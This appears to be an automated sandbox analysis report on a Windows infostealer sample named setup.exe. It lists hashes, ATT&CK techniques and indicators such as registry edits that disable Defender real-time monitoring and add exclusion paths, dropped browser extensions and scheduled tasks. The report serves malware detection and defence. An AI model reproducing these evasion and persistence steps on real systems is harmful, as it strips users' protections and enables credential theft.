db14e6863ac69e3e3f4980b8d35246a2b23fb49ba5df637f663d4e919bd86652

Resubmissions

24/08/2023, 11:27

230824-nkwsxscb93 7

24/08/2023, 11:23

230824-nhgwzsdg2y 7

24/08/2023, 11:05

230824-m6t1sadf2s 10

Analysis

max time kernel
121s
max time network
125s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
24/08/2023, 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

7.2MB
MD5

858d793cf7b8ba4381ce447e91dd5975
SHA1

ca790bbe56d76188fcc6bf63739c770239ab0441
SHA256

db14e6863ac69e3e3f4980b8d35246a2b23fb49ba5df637f663d4e919bd86652
SHA512

d4803602a55c1c510df11ec85980b62c9ece34ccd6e9b0130cdd31cfdcd8e44a360d0043517426637c15d68a980eb2ffd6c44a2dd7343dbc6d47d4ed3c7cacc2
SSDEEP

196608:91OkDh5/O74iqo1sVqYgM/mDHFD/JXUkA1z1E+lQQlq:3OkDhFO74iF1sVD/OU1z1EJQ4

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XFoDPUdvU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zYpfbkoKIxTU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KJfFrQOSboyPfmaF = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\frElYRIoNdjEJnGOQGR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\frElYRIoNdjEJnGOQGR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KJfFrQOSboyPfmaF = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ADdeFhyguSUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zYpfbkoKIxTU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KJfFrQOSboyPfmaF = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XFoDPUdvU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fOxnEmfbvtyaC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\IIVGwqYHKRWxGfVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ADdeFhyguSUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fOxnEmfbvtyaC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\IIVGwqYHKRWxGfVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KJfFrQOSboyPfmaF = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
24	2020	rundll32.exe

Executes dropped EXE 4 IoCs

pid	Process
2800	Install.exe
2900	Install.exe
2364	RtAHwAp.exe
2944	wowjNFV.exe

Loads dropped DLL 12 IoCs

pid	Process
3012	setup.exe
2800	Install.exe
2800	Install.exe
2800	Install.exe
2800	Install.exe
2900	Install.exe
2900	Install.exe
2900	Install.exe
2020	rundll32.exe
2020	rundll32.exe
2020	rundll32.exe
2020	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	wowjNFV.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	wowjNFV.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_639DDF4AB55B1ED42CE80CDD4E47280A	wowjNFV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_639DDF4AB55B1ED42CE80CDD4E47280A	wowjNFV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8A8F356C97F41E6E07EC03A3EE843934	wowjNFV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8A8F356C97F41E6E07EC03A3EE843934	wowjNFV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_FAF33ECAA375BFFC6652FF6FCBFB702B	wowjNFV.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	RtAHwAp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	wowjNFV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	wowjNFV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	wowjNFV.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	RtAHwAp.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_FAF33ECAA375BFFC6652FF6FCBFB702B	wowjNFV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	wowjNFV.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	RtAHwAp.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	wowjNFV.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	wowjNFV.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	wowjNFV.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	wowjNFV.exe
File created	C:\Program Files (x86)\XFoDPUdvU\ILHIBsp.xml	wowjNFV.exe
File created	C:\Program Files (x86)\zYpfbkoKIxTU2\MBnmYiUlxtQQy.dll	wowjNFV.exe
File created	C:\Program Files (x86)\frElYRIoNdjEJnGOQGR\VKqTORC.xml	wowjNFV.exe
File created	C:\Program Files (x86)\ADdeFhyguSUn\ZLHqCnz.dll	wowjNFV.exe
File created	C:\Program Files (x86)\XFoDPUdvU\BmiltQ.dll	wowjNFV.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	wowjNFV.exe
File created	C:\Program Files (x86)\zYpfbkoKIxTU2\XXvSBXP.xml	wowjNFV.exe
File created	C:\Program Files (x86)\frElYRIoNdjEJnGOQGR\bYAPtmy.dll	wowjNFV.exe
File created	C:\Program Files (x86)\fOxnEmfbvtyaC\aLYlqSm.dll	wowjNFV.exe
File created	C:\Program Files (x86)\fOxnEmfbvtyaC\MFLTKnD.xml	wowjNFV.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	wowjNFV.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bRrLmincsdUQgplWAx.job	schtasks.exe
File created	C:\Windows\Tasks\DIGMaOalKgfyEtfbb.job	schtasks.exe
File created	C:\Windows\Tasks\ZvkNugpROavukWn.job	schtasks.exe
File created	C:\Windows\Tasks\eKBistvZSCqmfmzvd.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2608	schtasks.exe
2480	schtasks.exe
1920	schtasks.exe
2392	schtasks.exe
968	schtasks.exe
2176	schtasks.exe
2020	schtasks.exe
2880	schtasks.exe
988	schtasks.exe
1876	schtasks.exe
3024	schtasks.exe
1816	schtasks.exe
1116	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	wowjNFV.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wowjNFV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-99-80-8a-85-77\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FBC97F47-76A6-4EF4-BA13-AB63BE166F3D}\52-99-80-8a-85-77	wowjNFV.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-99-80-8a-85-77\WpadDecisionTime = e073681b7bd6d901	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FBC97F47-76A6-4EF4-BA13-AB63BE166F3D}\WpadDecision = "0"	wowjNFV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FBC97F47-76A6-4EF4-BA13-AB63BE166F3D}\WpadDecisionReason = "1"	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	wowjNFV.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ac000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FBC97F47-76A6-4EF4-BA13-AB63BE166F3D}\WpadNetworkName = "Network 3"	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-99-80-8a-85-77\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	wowjNFV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ac000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	wowjNFV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-99-80-8a-85-77\WpadDecisionReason = "1"	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FBC97F47-76A6-4EF4-BA13-AB63BE166F3D}\52-99-80-8a-85-77	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-99-80-8a-85-77\WpadDetectedUrl	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-99-80-8a-85-77\WpadDecision = "0"	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	wowjNFV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	wowjNFV.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
436	powershell.EXE
436	powershell.EXE
436	powershell.EXE
320	powershell.EXE
320	powershell.EXE
320	powershell.EXE
2460	powershell.EXE
2460	powershell.EXE
2460	powershell.EXE
2236	powershell.EXE
2236	powershell.EXE
2236	powershell.EXE
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe
2944	wowjNFV.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	436	powershell.EXE
Token: SeDebugPrivilege	320	powershell.EXE
Token: SeDebugPrivilege	2460	powershell.EXE
Token: SeDebugPrivilege	2236	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 2800	3012	setup.exe	28
PID 3012 wrote to memory of 2800	3012	setup.exe	28
PID 3012 wrote to memory of 2800	3012	setup.exe	28
PID 3012 wrote to memory of 2800	3012	setup.exe	28
PID 3012 wrote to memory of 2800	3012	setup.exe	28
PID 3012 wrote to memory of 2800	3012	setup.exe	28
PID 3012 wrote to memory of 2800	3012	setup.exe	28
PID 2800 wrote to memory of 2900	2800	Install.exe	29
PID 2800 wrote to memory of 2900	2800	Install.exe	29
PID 2800 wrote to memory of 2900	2800	Install.exe	29
PID 2800 wrote to memory of 2900	2800	Install.exe	29
PID 2800 wrote to memory of 2900	2800	Install.exe	29
PID 2800 wrote to memory of 2900	2800	Install.exe	29
PID 2800 wrote to memory of 2900	2800	Install.exe	29
PID 2900 wrote to memory of 2968	2900	Install.exe	31
PID 2900 wrote to memory of 2968	2900	Install.exe	31
PID 2900 wrote to memory of 2968	2900	Install.exe	31
PID 2900 wrote to memory of 2968	2900	Install.exe	31
PID 2900 wrote to memory of 2968	2900	Install.exe	31
PID 2900 wrote to memory of 2968	2900	Install.exe	31
PID 2900 wrote to memory of 2968	2900	Install.exe	31
PID 2900 wrote to memory of 2872	2900	Install.exe	34
PID 2900 wrote to memory of 2872	2900	Install.exe	34
PID 2900 wrote to memory of 2872	2900	Install.exe	34
PID 2900 wrote to memory of 2872	2900	Install.exe	34
PID 2900 wrote to memory of 2872	2900	Install.exe	34
PID 2900 wrote to memory of 2872	2900	Install.exe	34
PID 2900 wrote to memory of 2872	2900	Install.exe	34
PID 2968 wrote to memory of 3000	2968	forfiles.exe	36
PID 2968 wrote to memory of 3000	2968	forfiles.exe	36
PID 2968 wrote to memory of 3000	2968	forfiles.exe	36
PID 2968 wrote to memory of 3000	2968	forfiles.exe	36
PID 2968 wrote to memory of 3000	2968	forfiles.exe	36
PID 2968 wrote to memory of 3000	2968	forfiles.exe	36
PID 2968 wrote to memory of 3000	2968	forfiles.exe	36
PID 2872 wrote to memory of 2712	2872	forfiles.exe	35
PID 2872 wrote to memory of 2712	2872	forfiles.exe	35
PID 2872 wrote to memory of 2712	2872	forfiles.exe	35
PID 2872 wrote to memory of 2712	2872	forfiles.exe	35
PID 2872 wrote to memory of 2712	2872	forfiles.exe	35
PID 2872 wrote to memory of 2712	2872	forfiles.exe	35
PID 2872 wrote to memory of 2712	2872	forfiles.exe	35
PID 3000 wrote to memory of 2720	3000	cmd.exe	38
PID 3000 wrote to memory of 2720	3000	cmd.exe	38
PID 3000 wrote to memory of 2720	3000	cmd.exe	38
PID 3000 wrote to memory of 2720	3000	cmd.exe	38
PID 3000 wrote to memory of 2720	3000	cmd.exe	38
PID 3000 wrote to memory of 2720	3000	cmd.exe	38
PID 3000 wrote to memory of 2720	3000	cmd.exe	38
PID 2712 wrote to memory of 2728	2712	cmd.exe	37
PID 2712 wrote to memory of 2728	2712	cmd.exe	37
PID 2712 wrote to memory of 2728	2712	cmd.exe	37
